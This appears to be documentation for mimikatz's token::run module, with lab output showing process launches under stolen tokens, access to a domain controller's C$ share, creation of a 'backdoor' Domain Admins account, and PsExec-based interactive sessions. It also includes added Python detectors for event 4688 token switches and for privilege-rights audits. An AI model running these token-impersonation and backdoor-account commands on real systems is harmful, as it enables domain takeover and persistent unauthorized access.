# run

`token::run` executes a new process with its token.

It has the following command line arguments:

* [`/id`](#id): Token id to use for the new process
* [`/user`](#user): Execute the process with a token of this user (instead of specifying the token ID).
* [`/process`](#process): The process to run. By default, the command `whoami` is executed.

## Preparation

List tokens of user to impersonate using the `token::list` module:

```
mimikatz # token::list /user:ffast
Token Id  : 0
User name : ffast
SID name  :
 
5332    {0;000563b2} 2 F 457263         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,24p)       Primary
4432    {0;000563b2} 2 F 2839551        winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,24p)       Primary
668     {0;00050574} 0 D 329079         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (12g,24p)       Impersonation (Impersonation)
668     {0;000563e4} 2 L 353269         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,02p)       Impersonation (Impersonation)
800     {0;000563e4} 2 L 456098         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,02p)       Impersonation (Impersonation)
920     {0;000563e4} 2 L 380750         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,02p)       Impersonation (Impersonation)
920     {0;000563e4} 2 L 387116         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,01p)       Impersonation (Identification)
920     {0;000563e4} 2 L 436160         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,02p)       Impersonation (Impersonation)
[...]
```

## id

Run a command using a token selected by its token ID. By default, the command `whoami` is executed:

```
mimikatz # token::run /id:457263
Token Id  : 457263
User name :
SID name  :

676     {0;000f0ac5} 3 F 457263         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,24p)       Primary
winattacklab\ffast
```

## user

Run a command using a token selected by its username. The username is given without the domain name. By default, the command `whoami` is executed:

```
mimikatz # token::run /user:ffast
Token Id  : 457263
User name :
SID name  :

676     {0;000f0ac5} 3 F 457263         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,24p)       Primary
winattacklab\ffast
```

## process

Any other command line can be spawned with the `/process` argument.

Example accessing the system drive of the domain controller:

```
mimikatz # token::run /id:1075487 /process:"cmd.exe /c dir \\dc1\c$"
Token Id  : 1075487
User name :
SID name  :

7156    {0;000f0ac5} 3 F 1075487        winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,24p)       Primary
 Volume in drive \\dc1\c$ is Windows
 Volume Serial Number is 6A6C-0DE3

 Directory of \\dc1\c$

05/31/2023  06:30 AM    <DIR>          AzureData
05/31/2023  07:09 AM    <DIR>          ddns_server
05/31/2023  07:04 AM    <DIR>          inetpub
05/31/2023  06:46 AM    <DIR>          Packages
05/05/2023  11:31 AM    <DIR>          PerfLogs
05/31/2023  07:04 AM    <DIR>          Program Files
05/05/2023  12:26 PM    <DIR>          Program Files (x86)
05/31/2023  07:10 AM    <DIR>          terraform
05/31/2023  07:06 AM    <DIR>          Users
05/31/2023  07:05 AM    <DIR>          Windows
05/31/2023  06:33 AM    <DIR>          WindowsAzure
05/31/2023  07:07 AM    <DIR>          WSUS
               0 File(s)              0 bytes
              12 Dir(s)  15,918,473,216 bytes free
```

Add backdoor user:

```
mimikatz # token::run /id:1075487 /process:"cmd.exe /c net user backdoor Password.123 /add /domain && net group \"Domain Admins\" backdoor /add /domain && net user backdoor /domain"
Token Id  : 1075487
User name :
SID name  :

7156    {0;000f0ac5} 3 F 1075487        winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,24p)       Primary
The request will be processed at a domain controller for domain winattacklab.local.

The command completed successfully.

The request will be processed at a domain controller for domain winattacklab.local.

The command completed successfully.

The request will be processed at a domain controller for domain winattacklab.local.

User name                    backdoor
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/20/2023 3:59:27 PM
Password expires             Never
Password changeable          6/20/2023 3:59:27 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Admins        *Domain Users
The command completed successfully.
```

It is not possible to start a new interactive PowerShell process directly, because user input to the new process is not handled correctly. However, when PowerShell is started via PsExec, it can be used interactively:

```
mimikatz # token::run /id:77132228 /process:"C:\tools\PsExec64.exe -accepteula -i powershell.exe"
Token Id  : 77132228
User name :
SID name  :

8544    {0;0498f042} 2 L 77132228       child\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (14g,05p)       Primary

PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
```

A new PowerShell window is then opened, which can be used interactively:

```
PS C:\Windows\system32> whoami
winattacklab\ffast

PS C:\Windows\system32> Enter-PSSession DC1
[DC1]: PS C:\Users\ffast\Documents> hostname
DC1
[DC1]: PS C:\Users\ffast\Documents> whoami
winattacklab\ffast
[DC1]: PS C:\Users\ffast\Documents> ls \


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        5/31/2023   6:30 AM                AzureData
d-----        5/31/2023   7:09 AM                ddns_server
d-----        5/31/2023   7:04 AM                inetpub
d-----        5/31/2023   6:46 AM                Packages
d-----         5/5/2023  11:31 AM                PerfLogs
d-r---        5/31/2023   7:04 AM                Program Files
d-----         5/5/2023  12:26 PM                Program Files (x86)
d-----        5/31/2023   7:10 AM                terraform
d-r---        6/22/2023   1:02 PM                Users
d-r---        6/20/2023   5:27 PM                Windows
d-----        5/31/2023   6:33 AM                WindowsAzure
d-----        5/31/2023   7:07 AM                WSUS
```
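From the defender's side, the process creations shown above leave a distinctive trace: Security event 4688 (requires "Audit Process Creation" to be enabled) records both the Creator Subject (the account that called `CreateProcess*`) and the Target Subject (the account the new process actually runs as). For an ordinary process start the Target Subject fields are `-`/NULL SID; when a process is created under another account's token, as `token::run` does, they hold that account. The following added example (not part of the mimikatz documentation) runs that check over constructed 4688 records; the field names follow the event's EventData, the values and the `ALLOWED_CREATORS` baseline are assumptions to tune per environment (logon and service startup legitimately create processes under other accounts from `SYSTEM`).

```python
from dataclasses import dataclass
from typing import List, Optional

# Creators that routinely spawn processes under other accounts (winlogon -> userinit
# as the logging-on user, services.exe -> service accounts). Assumed baseline; extend
# with your own environment's known-good creators.
ALLOWED_CREATORS = {("NT AUTHORITY", "SYSTEM")}


@dataclass(frozen=True)
class Finding:
    creator: str  # DOMAIN\user whose token requested the process creation
    target: str   # DOMAIN\user the new process runs as
    process: str
    parent: str


# Constructed 4688 EventData records (field names as in the Windows Security log,
# values invented for this example).
SAMPLE_4688 = [
    # Normal start: Target Subject is "-", the process inherits the creator's token.
    {"SubjectUserName": "ffast", "SubjectDomainName": "WINATTACKLAB", "SubjectLogonId": "0x563b2",
     "TargetUserName": "-", "TargetDomainName": "-", "TargetLogonId": "0x0",
     "NewProcessName": "C:\\Windows\\System32\\notepad.exe",
     "ParentProcessName": "C:\\Windows\\explorer.exe"},
    # A local admin's session creates cmd.exe under a domain user's token.
    {"SubjectUserName": "localadmin", "SubjectDomainName": "WS01", "SubjectLogonId": "0xf0ac5",
     "TargetUserName": "ffast", "TargetDomainName": "WINATTACKLAB", "TargetLogonId": "0x563b2",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "ParentProcessName": "C:\\tools\\mimikatz.exe"},
    # Same account, different logon session: not a token switch between accounts.
    {"SubjectUserName": "svc_sched", "SubjectDomainName": "WINATTACKLAB", "SubjectLogonId": "0x3e7",
     "TargetUserName": "svc_sched", "TargetDomainName": "WINATTACKLAB", "TargetLogonId": "0x1a2b3",
     "NewProcessName": "C:\\Windows\\System32\\svchost.exe",
     "ParentProcessName": "C:\\Windows\\System32\\services.exe"},
    # Interactive logon: SYSTEM (winlogon) starts userinit as the user. Baseline noise.
    {"SubjectUserName": "SYSTEM", "SubjectDomainName": "NT AUTHORITY", "SubjectLogonId": "0x3e7",
     "TargetUserName": "ffast", "TargetDomainName": "WINATTACKLAB", "TargetLogonId": "0x563e4",
     "NewProcessName": "C:\\Windows\\System32\\userinit.exe",
     "ParentProcessName": "C:\\Windows\\System32\\winlogon.exe"},
]


def _account(domain: str, user: str) -> str:
    return f"{domain}\\{user}"


def token_switch(rec: dict) -> Optional[Finding]:
    """Return a Finding when a 4688 record shows the new process running under a
    different account than its creator, None otherwise."""
    target_user = rec.get("TargetUserName", "-")
    if target_user in ("-", ""):
        return None  # no separate target token was used
    creator_key = (rec["SubjectDomainName"].upper(), rec["SubjectUserName"].upper())
    target_key = (rec["TargetDomainName"].upper(), target_user.upper())
    if creator_key == target_key or creator_key in ALLOWED_CREATORS:
        return None
    return Finding(
        creator=_account(rec["SubjectDomainName"], rec["SubjectUserName"]),
        target=_account(rec["TargetDomainName"], target_user),
        process=rec.get("NewProcessName", "?"),
        parent=rec.get("ParentProcessName", "?"),
    )


def scan(records: List[dict]) -> List[Finding]:
    """Apply token_switch to every record and keep the hits."""
    return [f for f in (token_switch(r) for r in records) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_4688):
        print(f"{f.creator} started {f.process} as {f.target} (parent: {f.parent})")
```

A hit where the creator is an interactive local account and the parent is a non-standard binary, as in the second record, is worth an immediate look; pair it with event 4672 (special privileges assigned at logon) to see whether the creator's session held `SeAssignPrimaryTokenPrivilege` at all.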

## Demystifying the `kull_m_process_run_data` Error

Even as a local administrator, you can get the `kull_m_process_run_data` error:

```
mimikatz # token::run /id:1075487 /process:whoami.exe
Token Id  : 1075487
User name :
SID name  :

7156    {0;000f0ac5} 3 F 1075487        winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,24p)       Primary
ERROR kull_m_process_run_data ; CreateProcessAsUser (0x00000522)
```

The error message says that the `CreateProcessAsUser` call failed; `0x00000522` is `ERROR_PRIVILEGE_NOT_HELD`.

The `token::run` command uses the function `CreateProcessAsUser` to create a new process in the security context of the specified token, which requires the following privileges (source: [CreateProcessAsUserA function (processthreadsapi.h)](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessasusera)):

* `SeIncreaseQuotaPrivilege` privilege
* `SeAssignPrimaryTokenPrivilege` privilege (if the token is not assignable)

A local admin can enable the `SeIncreaseQuotaPrivilege` privilege but does not hold `SeAssignPrimaryTokenPrivilege`, so enabling it fails with `STATUS_PRIVILEGE_NOT_HELD` (`c0000061`):

```
mimikatz # privilege::name SeIncreaseQuotaPrivilege
Privilege '5' OK

mimikatz # privilege::name SeAssignPrimaryTokenPrivilege
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (3) c0000061
```

If you start mimikatz as `SYSTEM`, both privileges can be enabled:

```
mimikatz # privilege::name SeIncreaseQuotaPrivilege
Privilege '5' OK

mimikatz # privilege::name SeAssignPrimaryTokenPrivilege
Privilege '3' OK
```

Then `token::run` works and stolen tokens can be used as primary tokens.
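Because the whole technique hinges on who holds `SeAssignPrimaryTokenPrivilege` ("Replace a process level token") and `SeIncreaseQuotaPrivilege` ("Adjust memory quotas for a process"), a defender wants to know which principals have been granted those user rights beyond the Windows defaults (LOCAL SERVICE and NETWORK SERVICE for both, plus BUILTIN\Administrators for `SeIncreaseQuotaPrivilege`). The following added example (not part of the mimikatz documentation) parses the `[Privilege Rights]` section of a `secedit /export /cfg <file>` template and reports unexpected holders. The INF text is constructed for the example (a real export is UTF-16 and must be opened with `encoding="utf-16"`), and the extra SID in it is an invented placeholder.

```python
import configparser
from typing import Dict, List, Set

# Default holders of the two user rights on a stock Windows install (well-known SIDs):
# S-1-5-19 LOCAL SERVICE, S-1-5-20 NETWORK SERVICE, S-1-5-32-544 BUILTIN\Administrators.
DEFAULT_HOLDERS: Dict[str, Set[str]] = {
    "SeAssignPrimaryTokenPrivilege": {"S-1-5-19", "S-1-5-20"},
    "SeIncreaseQuotaPrivilege": {"S-1-5-19", "S-1-5-20", "S-1-5-32-544"},
}

# Constructed excerpt of a secedit export. The SID ending in -1001 is an invented
# placeholder standing in for an account that was granted the right by policy.
SAMPLE_INF = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-21-1111111111-2222222222-3333333333-1001
SeIncreaseQuotaPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544
SeDebugPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_privilege_rights(inf_text: str) -> Dict[str, Set[str]]:
    """Map each privilege in [Privilege Rights] to the set of holders listed for it.
    Entries are comma separated; a leading '*' marks a SID, plain names may also occur."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep privilege names in their original case
    cp.read_string(inf_text)
    rights: Dict[str, Set[str]] = {}
    for name, value in cp["Privilege Rights"].items():
        holders = {entry.strip().lstrip("*") for entry in value.split(",") if entry.strip()}
        rights[name] = holders
    return rights


def unexpected_holders(rights: Dict[str, Set[str]],
                       baseline: Dict[str, Set[str]] = DEFAULT_HOLDERS) -> Dict[str, List[str]]:
    """For each audited privilege, list holders that are not in the baseline.
    A privilege missing from the export counts as having no holders."""
    return {priv: sorted(rights.get(priv, set()) - expected)
            for priv, expected in baseline.items()}


if __name__ == "__main__":
    # On a real host: secedit /export /cfg rights.inf, then
    # open("rights.inf", encoding="utf-16").read() instead of SAMPLE_INF.
    for priv, extra in unexpected_holders(parse_privilege_rights(SAMPLE_INF)).items():
        print(f"{priv}: {'OK' if not extra else 'unexpected holders ' + ', '.join(extra)}")
```

Any non-default holder of `SeAssignPrimaryTokenPrivilege` is an account that can do what the page shows without first becoming `SYSTEM`, so each entry should be traceable to a documented service requirement; resolve the SIDs to names before reporting.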


